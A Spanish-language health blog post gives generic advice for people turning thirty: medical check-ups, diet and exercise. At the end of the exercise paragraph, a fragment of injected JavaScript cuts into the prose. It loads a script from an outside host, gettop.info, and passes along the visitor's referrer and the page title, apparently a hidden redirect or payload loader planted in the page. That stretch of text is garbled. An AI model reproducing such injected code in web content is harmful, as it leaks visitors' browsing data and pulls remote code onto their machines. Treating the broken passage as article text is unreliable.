Salud y belleza » Salud

La salud y la crisis de los treinta

Sin Comentarios

La famosa crisis de los treinta años representa un mar de dudas e incógnitas tanto para hombres y mujeres: se trata de un período especial en el cual la edad y el calendario comienzan a pesar y los balances, también, toman gran importancia.

Suelen decir los expertos que la mejor medicina para esas crisis de los treinta consiste, para el hombre, en adquirir un coche descapotable y, para la mujer, en implantarse un poco de botox en una zona a libre elección. Pero la verdadera medicina es otra, estos no son remedios sino consentimientos populares bastante caprichosos o placebos emocionales, por llamarlos de algún modo.

La mejor forma de encarar los treinta es prestándole vital importancia a cuestiones relacionadas, no con ese tipo de cargas psicológicas, sino con la salud, el estado físico y el metabolismo. Efectivamente, la juventud es una cuestión mental aunque la salud desgraciadamente sí depende de otros factores.

¿De qué tipo de factores hablamos? Repasemos algunos de ellos, es decir, los cuidados especiales que debemos tener en cuenta pasado el límite de los veintinueve años y no sufrir la crisis de los treinta

Chequeos regulares

Estos deben incluir: exámenes de sangre y de orina (para analizar el nivel de colesterol, el estado de los riñones, hígado, la creatinina, el sodio, el azúcar, el ácido úrico, la glucosa y mucho más), radiografías de tórax y pruebas de espirometría (de esa manera se consiguen detectar problemas pulmonares, tumores, tuberculosis, infecciones), ecografías de abdomen (para controlar el hígado, riñones, bazo, vejiga) y los famosos electrocardiogramas. También es fundamental acudir al dentista para controlar la dentadura y, en el caso de las mujeres, es muy importante, a su vez, el chequeo ginecológico.

Dieta balanceada

Naturalmente, a los treinta las necesidades nutricionales no son las mismas que cuando tenías veinte o veinticinco años. El metabolismo y la salud cambian con la edad, así el cuerpo necesita de otros nutrientes. Pasada la barrera de las tres décadas es recomendable incorporar: antioxidantes -sustancias que combaten el deterioro de las células, fortalecen el sistema inmune y retrasan el envejecimiento-, vitamina B y proteínas -ayudan a mantener la piel y otros órganos en buenas condiciones-. Además se recomienda no comer con demasiada sal, aumentar la bebida de líquidos, reducir el consumo de grasas y azucares al igual que las bebidas alcohólicas.

Actividad física

No hay que tenerle miedo al deporte y el paso de los años. Solo basta con darle la intensidad correcta y tomar los cuidados necesarios. Cualquier deporte se puede practicar, incluso, con treinta años pero siempre recuerda: hacer un adecuado calentamiento previo, colocarle la protección adecuada, regular los esfuerzos y, lógicamente, realizar chequeos que demuestren que estás en condiciones de exigir tu físico y metabolismo de esa manera.} else {s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.